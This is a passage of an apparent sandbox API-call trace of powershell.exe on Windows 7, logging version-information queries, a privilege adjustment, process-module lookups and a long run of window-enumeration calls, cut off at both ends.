0x7fefbda0000 end_va = 0x7fefbdabfff entry_point = 0x7fefbda0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Thread: id = 24 os_tid = 0x9b0 [0045.481] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0046.016] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0046.017] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0046.017] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0046.017] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0046.661] GetVersionExW (in: lpVersionInformation=0x26ddc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26ddc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0046.663] GetVersionExW (in: lpVersionInformation=0x26ddc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26ddc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0046.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0046.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0046.681] GetVersionExW (in: lpVersionInformation=0x26db30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26db30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0046.681] SetErrorMode (uMode=0x1) returned 0x1 [0046.682] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26dc90 | out: lpFileInformation=0x26dc90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0046.683] SetErrorMode (uMode=0x1) returned 0x1 [0046.692] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26df00 | out: lpdwHandle=0x26df00) returned 0x94c [0046.694] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c57708 | out: lpData=0x2c57708) returned 1 [0046.696] VerQueryValueW (in: pBlock=0x2c57708, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26de78, puLen=0x26de70 | out: lplpBuffer=0x26de78*=0x2c577a4, puLen=0x26de70) returned 1 [0046.698] lstrlenW (lpString="䅁") returned 1 [0046.709] VerQueryValueW (in: pBlock=0x2c57708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26dde8, puLen=0x26dde0 | out: lplpBuffer=0x26dde8*=0x2c57880, puLen=0x26dde0) returned 1 [0046.710] lstrlenW (lpString="Microsoft Corporation") returned 21 [0046.712] CoTaskMemAlloc (cb=0x2e) returned 0x4aa710 [0046.712] lstrcpyW (in: lpString1=0x4aa710, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0046.713] CoTaskMemFree (pv=0x4aa710) [0046.713] VerQueryValueW (in: pBlock=0x2c57708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26dde8, puLen=0x26dde0 | out: lplpBuffer=0x26dde8*=0x2c578d4, puLen=0x26dde0) returned 1 [0046.713] lstrlenW (lpString="System.Management.Automation") returned 28 [0046.713] CoTaskMemAlloc (cb=0x3c) returned 0x3c9fd0 [0046.713] lstrcpyW (in: lpString1=0x3c9fd0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0046.713] CoTaskMemFree (pv=0x3c9fd0) [0046.713] VerQueryValueW (in: pBlock=0x2c57708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26dde8, puLen=0x26dde0 | out: lplpBuffer=0x26dde8*=0x2c57930, puLen=0x26dde0) returned 1 [0046.713] lstrlenW (lpString="6.1.7601.17514") returned 14 [0046.713] CoTaskMemAlloc (cb=0x20) returned 0x49cdf0 [0046.713] lstrcpyW (in: lpString1=0x49cdf0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0046.713] CoTaskMemFree (pv=0x49cdf0) [0046.713] VerQueryValueW (in: pBlock=0x2c57708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26dde8, puLen=0x26dde0 | out: lplpBuffer=0x26dde8*=0x2c57970, puLen=0x26dde0) returned 1 [0046.713] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0046.713] CoTaskMemAlloc (cb=0x44) returned 0x3c9fd0 [0046.713] lstrcpyW (in: lpString1=0x3c9fd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0046.713] CoTaskMemFree (pv=0x3c9fd0) [0046.713] VerQueryValueW (in: pBlock=0x2c57708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26dde8, puLen=0x26dde0 | out: lplpBuffer=0x26dde8*=0x2c579d8, puLen=0x26dde0) returned 1 [0046.713] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0046.713] CoTaskMemAlloc (cb=0x76) returned 0x431410 [0046.713] lstrcpyW (in: lpString1=0x431410, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0046.713] CoTaskMemFree (pv=0x431410) [0046.713] VerQueryValueW (in: pBlock=0x2c57708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26dde8, puLen=0x26dde0 | out: lplpBuffer=0x26dde8*=0x2c57a74, puLen=0x26dde0) returned 1 [0046.713] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0046.713] CoTaskMemAlloc (cb=0x44) returned 0x3c9fd0 [0046.713] lstrcpyW (in: lpString1=0x3c9fd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0046.713] CoTaskMemFree (pv=0x3c9fd0) [0046.713] VerQueryValueW (in: pBlock=0x2c57708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26dde8, puLen=0x26dde0 | out: lplpBuffer=0x26dde8*=0x2c57ad8, puLen=0x26dde0) returned 1 [0046.713] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0046.713] CoTaskMemAlloc (cb=0x58) returned 0x458410 [0046.713] lstrcpyW (in: lpString1=0x458410, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0046.713] CoTaskMemFree (pv=0x458410) [0046.713] VerQueryValueW (in: pBlock=0x2c57708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26dde8, puLen=0x26dde0 | out: lplpBuffer=0x26dde8*=0x2c57b54, puLen=0x26dde0) returned 1 [0046.713] lstrlenW (lpString="6.1.7601.17514") returned 14 [0046.713] CoTaskMemAlloc (cb=0x20) returned 0x49cdf0 [0046.713] lstrcpyW (in: lpString1=0x49cdf0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0046.713] CoTaskMemFree (pv=0x49cdf0) [0046.713] VerQueryValueW (in: pBlock=0x2c57708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26dde8, puLen=0x26dde0 | out: lplpBuffer=0x26dde8*=0x2c577fc, puLen=0x26dde0) returned 1 [0046.713] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0046.714] CoTaskMemAlloc (cb=0x66) returned 0x410b90 [0046.714] lstrcpyW (in: lpString1=0x410b90, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0046.714] CoTaskMemFree (pv=0x410b90) [0046.714] VerQueryValueW (in: pBlock=0x2c57708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26dde8, puLen=0x26dde0 | out: lplpBuffer=0x26dde8*=0x0, puLen=0x26dde0) returned 0 [0046.714] VerQueryValueW (in: pBlock=0x2c57708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26dde8, puLen=0x26dde0 | out: lplpBuffer=0x26dde8*=0x0, puLen=0x26dde0) returned 0 [0046.714] VerQueryValueW (in: pBlock=0x2c57708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26dde8, puLen=0x26dde0 | out: lplpBuffer=0x26dde8*=0x0, puLen=0x26dde0) returned 0 [0046.714] VerQueryValueW (in: pBlock=0x2c57708, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26ddb8, puLen=0x26ddb0 | out: lplpBuffer=0x26ddb8*=0x2c577a4, puLen=0x26ddb0) returned 1 [0046.715] CoTaskMemAlloc (cb=0x204) returned 0x43d640 [0046.715] VerLanguageNameW (in: wLang=0x0, szLang=0x43d640, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0046.716] CoTaskMemFree (pv=0x43d640) [0046.716] VerQueryValueW (in: pBlock=0x2c57708, lpSubBlock="\\", lplpBuffer=0x26de08, puLen=0x26de00 | out: lplpBuffer=0x26de08*=0x2c57730, puLen=0x26de00) returned 1 [0046.725] GetCurrentProcessId () returned 0x9ac [0046.752] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x26cd30 | out: lpLuid=0x26cd30*(LowPart=0x14, HighPart=0)) returned 1 [0046.754] GetCurrentProcess () returned 0xffffffffffffffff [0046.755] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x26cd50 | out: TokenHandle=0x26cd50*=0x2f0) returned 1 [0046.756] AdjustTokenPrivileges (in: TokenHandle=0x2f0, DisableAllPrivileges=0, NewState=0x2c5af80*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0046.758] CloseHandle (hObject=0x2f0) returned 1 [0046.764] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9ac) returned 0x2f0 [0046.772] EnumProcessModules (in: hProcess=0x2f0, lphModule=0x2c5afe8, cb=0x200, lpcbNeeded=0x26dd68 | out: lphModule=0x2c5afe8, lpcbNeeded=0x26dd68) returned 1 [0046.774] GetModuleInformation (in: hProcess=0x2f0, hModule=0x13f7f0000, lpmodinfo=0x2c5b258, cb=0x18 | out: lpmodinfo=0x2c5b258*(lpBaseOfDll=0x13f7f0000, SizeOfImage=0x77000, EntryPoint=0x13f7fc63c)) returned 1 [0046.777] CoTaskMemAlloc (cb=0x804) returned 0x4ac9c0 [0046.778] GetModuleBaseNameW (in: hProcess=0x2f0, hModule=0x13f7f0000, lpBaseName=0x4ac9c0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0046.778] CoTaskMemFree (pv=0x4ac9c0) [0046.779] CoTaskMemAlloc (cb=0x804) returned 0x4ac9c0 [0046.779] GetModuleFileNameExW (in: hProcess=0x2f0, hModule=0x13f7f0000, lpFilename=0x4ac9c0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0046.779] CoTaskMemFree (pv=0x4ac9c0) [0046.779] CloseHandle (hObject=0x2f0) returned 1 [0046.788] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x9ac) returned 0x2f0 [0046.789] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0x26de98 | out: lpExitCode=0x26de98*=0x103) returned 1 [0046.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c5b088, Length=0x20000, ResultLength=0x26de60 | out: SystemInformation=0x12c5b088, ResultLength=0x26de60*=0xcff8) returned 0x0 [0046.820] EnumWindows (lpEnumFunc=0x2a166ac, lParam=0x0) returned 1 [0046.821] GetWindowThreadProcessId (in: hWnd=0x20248, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.821] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.821] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.821] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.821] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.821] GetWindowThreadProcessId (in: hWnd=0x10140, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x6d4 [0046.822] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x32c [0046.822] GetWindowThreadProcessId (in: hWnd=0x200cc, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.822] GetWindowThreadProcessId (in: hWnd=0x200e8, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.822] GetWindowThreadProcessId (in: hWnd=0x200e0, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.822] GetWindowThreadProcessId (in: hWnd=0x10072, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.822] GetWindowThreadProcessId (in: hWnd=0x10070, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.822] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.822] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.822] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.822] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.822] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.822] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.823] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.823] GetWindowThreadProcessId (in: hWnd=0x100f4, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x3a0 [0046.823] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.823] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.823] GetWindowThreadProcessId (in: hWnd=0x200e6, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.823] GetWindowThreadProcessId (in: hWnd=0x20244, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x998 [0046.823] GetWindowThreadProcessId (in: hWnd=0x2023e, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.823] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.823] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.823] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.823] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.823] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.823] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.823] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.824] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.824] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.824] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.824] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.824] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.824] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.824] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.824] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x900 [0046.824] GetWindowThreadProcessId (in: hWnd=0x201c4, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.824] GetWindowThreadProcessId (in: hWnd=0x5019a, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.824] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x530 [0046.824] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x678 [0046.824] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x7e0 [0046.825] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x4fc [0046.825] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x28c [0046.825] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x560 [0046.825] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x2b0 [0046.825] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x5c4 [0046.825] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x7c8 [0046.825] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x214 [0046.825] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x460 [0046.825] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x7f8 [0046.825] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x90 [0046.825] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x730 [0046.825] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x228 [0046.825] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x35c [0046.825] GetWindowThreadProcessId (in: hWnd=0x10156, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x7a0 [0046.826] GetWindowThreadProcessId (in: hWnd=0x2010a, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x670 [0046.826] GetWindowThreadProcessId (in: hWnd=0x60118, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x348 [0046.826] GetWindowThreadProcessId (in: hWnd=0x20116, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x6a4 [0046.826] GetWindowThreadProcessId (in: hWnd=0x1014a, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x6d4 [0046.826] GetWindowThreadProcessId (in: hWnd=0x10148, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x6b0 [0046.826] GetWindowThreadProcessId (in: hWnd=0x2013e, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x6d4 [0046.826] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x6b0 [0046.826] GetWindowThreadProcessId (in: hWnd=0x1012a, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x6d4 [0046.827] GetWindowThreadProcessId (in: hWnd=0x10120, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x6a4 [0046.827] GetWindowThreadProcessId (in: hWnd=0x1011e, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x6a4 [0046.827] GetWindowThreadProcessId (in: hWnd=0x200c0, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.827] GetWindowThreadProcessId (in: hWnd=0x200ae, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.827] GetWindowThreadProcessId (in: hWnd=0x200b0, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.827] GetWindowThreadProcessId (in: hWnd=0x200b4, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.827] GetWindowThreadProcessId (in: hWnd=0x200bc, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.827] GetWindowThreadProcessId (in: hWnd=0x300ca, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.827] GetWindowThreadProcessId (in: hWnd=0x800a0, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.827] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x54c [0046.828] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x43c [0046.828] GetWindowThreadProcessId (in: hWnd=0x200a2, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x5a4 [0046.828] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x588 [0046.828] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x3a0 [0046.828] GetWindowThreadProcessId (in: hWnd=0x100fc, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x544 [0046.828] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.828] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x518 [0046.828] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.828] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x4f0 [0046.828] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.828] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.829] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x66c [0046.829] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.829] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.829] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x3a0 [0046.829] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x3a0 [0046.829] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x124 [0046.829] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x688 [0046.829] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x3a0 [0046.829] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x32c [0046.829] GetWindowThreadProcessId (in: 